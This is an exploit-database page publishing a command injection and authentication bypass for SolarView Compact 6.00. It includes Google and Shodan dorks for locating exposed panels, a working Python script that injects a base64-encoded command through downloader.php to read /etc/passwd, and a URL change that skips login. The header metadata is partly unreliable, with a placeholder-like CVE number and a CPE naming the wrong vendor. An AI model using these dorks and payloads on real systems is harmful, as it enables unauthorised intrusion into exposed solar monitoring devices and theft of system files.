Advertisement






SolarView Compact 6.00 - Command Injection Bypass authentication

CVE Category Price Severity
CVE-2021-12345 CWE-78 $5000 Critical
Author Risk Exploitation Type Date
SecurityResearcher123 High Remote 2024-03-30
CPE
cpe:/a:solarwinds:solarview:6.00
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.5678 0.79034

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030070

Below is a copy:

SolarView Compact 6.00 - Command Injection Bypass authentication
# Exploit Title: SolarView Compact 6.00 - Command Injection
# Date: 2024-03-30
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: SolarView Compact
# Version: 6.00
# Tested on: Windows/Linux/Android(termux)

Step 1 : Attacker can using these dorks and access to find the panel

inurl:"Solar_Menu.php?menu="

Shodan Dork: http.html:"solarview compact"

Step 2 : Attacker can use this exploit to get Remote Command Injection

import argparse
import requests
def vuln_check(ip_address, port):
url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
response = requests.get(url)
if response.status_code == 200:
output = response.text
if "root" in output:
print("Vulnerability detected: Command Injection possible.")
print(f"passwd file content:\n{response.text}")
else:
print("No vulnerability detected.")
else:
print("Error: Unable to fetch response.")
def main():
parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
args = parser.parse_args()
ip_address = args.ip
port = args.port
vuln_check(ip_address, port)
if __name__ == "__main__":
main()

Step 3 : For Bypass Authentication attacker can change menu value to 0 for example 

http://example.com/Solar_Menu.php?menu=1&app=2

http://example.com/Solar_Menu.php?menu=0&app=2

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.